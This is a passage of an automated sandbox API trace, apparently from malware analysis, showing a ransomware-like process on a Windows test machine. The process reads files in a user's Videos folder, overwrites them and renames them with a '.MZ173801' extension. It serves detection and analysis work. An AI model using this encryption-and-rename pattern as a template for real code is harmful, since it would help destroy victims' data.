GetCurrentThreadId () returned 0x1358 [0119.267] GetCurrentThreadId () returned 0x1358 [0119.267] GetCurrentThreadId () returned 0x1358 [0119.267] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ad76e0, ftCreationTime.dwHighDateTime=0x1d5e708, ftLastAccessTime.dwLowDateTime=0xa0f3f860, ftLastAccessTime.dwHighDateTime=0x1d5e63b, ftLastWriteTime.dwLowDateTime=0xa0f3f860, ftLastWriteTime.dwHighDateTime=0x1d5e63b, nFileSizeHigh=0x0, nFileSizeLow=0xb8c6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RW17m0.mkv", cAlternateFileName="")) returned 1 [0119.267] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.267] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\RW17m0.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\rw17m0.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ad76e0, ftCreationTime.dwHighDateTime=0x1d5e708, ftLastAccessTime.dwLowDateTime=0xa0f3f860, ftLastAccessTime.dwHighDateTime=0x1d5e63b, ftLastWriteTime.dwLowDateTime=0xa0f3f860, ftLastWriteTime.dwHighDateTime=0x1d5e63b, nFileSizeHigh=0x0, nFileSizeLow=0xb8c6)) returned 1 [0119.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.268] GetCurrentThreadId () returned 0x1358 [0119.268] GetCurrentThreadId () returned 0x1358 [0119.268] GetCurrentThreadId () returned 0x1358 [0119.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.269] GetCurrentThreadId () returned 0x1358 [0119.269] GetCurrentThreadId () returned 0x1358 [0119.269] GetCurrentThreadId () returned 0x1358 [0119.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\RW17m0.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\rw17m0.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0119.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xb8c6 [0119.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.269] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xb8c6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xb8c6, lpOverlapped=0x0) returned 1 [0119.270] CloseHandle (hObject=0x3fc) returned 1 [0119.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\RW17m0.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\rw17m0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.273] WriteFile (in: hFile=0x3fc, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xb8c6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xb8c6, lpOverlapped=0x0) returned 1 [0119.274] CloseHandle (hObject=0x3fc) returned 1 [0119.276] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\RW17m0.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\rw17m0.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\RW17m0.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\rw17m0.mkv.mz173801")) returned 1 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] GetCurrentThreadId () returned 0x1358 [0119.277] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0x588a02b0, ftLastAccessTime.dwHighDateTime=0x1d5edb9, ftLastWriteTime.dwLowDateTime=0x588a02b0, ftLastWriteTime.dwHighDateTime=0x1d5edb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="suu6d", cAlternateFileName="")) returned 1 [0119.277] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2", cAlternateFileName="_C-ZBI~1")) returned 1 [0119.277] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2", cAlternateFileName="_C-ZBI~1")) returned 0 [0119.277] GetLastError () returned 0x12 [0119.277] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0119.277] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa85e706f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa85e706f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0119.277] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa85e706f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa85e706f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.278] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11ad870, ftCreationTime.dwHighDateTime=0x1d5ed05, ftLastAccessTime.dwLowDateTime=0x169ab8c0, ftLastAccessTime.dwHighDateTime=0x1d5eb4f, ftLastWriteTime.dwLowDateTime=0xa8089a7b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2de9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4AH f2Bl8-ulR2EqiiLE.mkv.MZ173801", cAlternateFileName="4AHF2B~1.MZ1")) returned 1 [0119.278] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d05690, ftCreationTime.dwHighDateTime=0x1d5f000, ftLastAccessTime.dwLowDateTime=0xc779b920, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0xa80afdbf, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18fb8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Axgfxe603muHSLYjsgC.swf.MZ173801", cAlternateFileName="AXGFXE~1.MZ1")) returned 1 [0119.278] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xaed18b40, ftLastAccessTime.dwHighDateTime=0x1d5ef2e, ftLastWriteTime.dwLowDateTime=0xaed18b40, ftLastWriteTime.dwHighDateTime=0x1d5ef2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="di1GF8YsdAcjrR-s", cAlternateFileName="DI1GF8~1")) returned 1 [0119.278] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.278] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xaed18b40, ftLastAccessTime.dwHighDateTime=0x1d5ef2e, ftLastWriteTime.dwLowDateTime=0xaed18b40, ftLastWriteTime.dwHighDateTime=0x1d5ef2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bce8 [0119.278] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xaed18b40, ftLastAccessTime.dwHighDateTime=0x1d5ef2e, ftLastWriteTime.dwLowDateTime=0xaed18b40, ftLastWriteTime.dwHighDateTime=0x1d5ef2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0119.278] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2f2770, ftCreationTime.dwHighDateTime=0x1d5e953, ftLastAccessTime.dwLowDateTime=0xaad81370, ftLastAccessTime.dwHighDateTime=0x1d5eda2, ftLastWriteTime.dwLowDateTime=0xaad81370, ftLastWriteTime.dwHighDateTime=0x1d5eda2, nFileSizeHigh=0x0, nFileSizeLow=0x1322, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="51xMNOj.flv", cAlternateFileName="")) returned 1 [0119.278] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0119.278] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\51xMNOj.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\51xmnoj.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2f2770, ftCreationTime.dwHighDateTime=0x1d5e953, ftLastAccessTime.dwLowDateTime=0xaad81370, ftLastAccessTime.dwHighDateTime=0x1d5eda2, ftLastWriteTime.dwLowDateTime=0xaad81370, ftLastWriteTime.dwHighDateTime=0x1d5eda2, nFileSizeHigh=0x0, nFileSizeLow=0x1322)) returned 1 [0119.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 